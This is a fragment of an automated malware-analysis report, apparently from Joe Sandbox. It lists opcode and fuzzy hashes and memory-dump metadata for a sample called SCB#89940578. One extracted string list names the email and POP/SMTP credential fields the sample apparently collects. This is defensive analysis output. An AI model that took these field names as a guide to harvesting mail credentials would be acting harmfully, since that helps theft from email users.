                                              • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                              • API String ID: 0-2111798378
                                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                              Uniqueness

                                              Uniqueness Score: -1.00%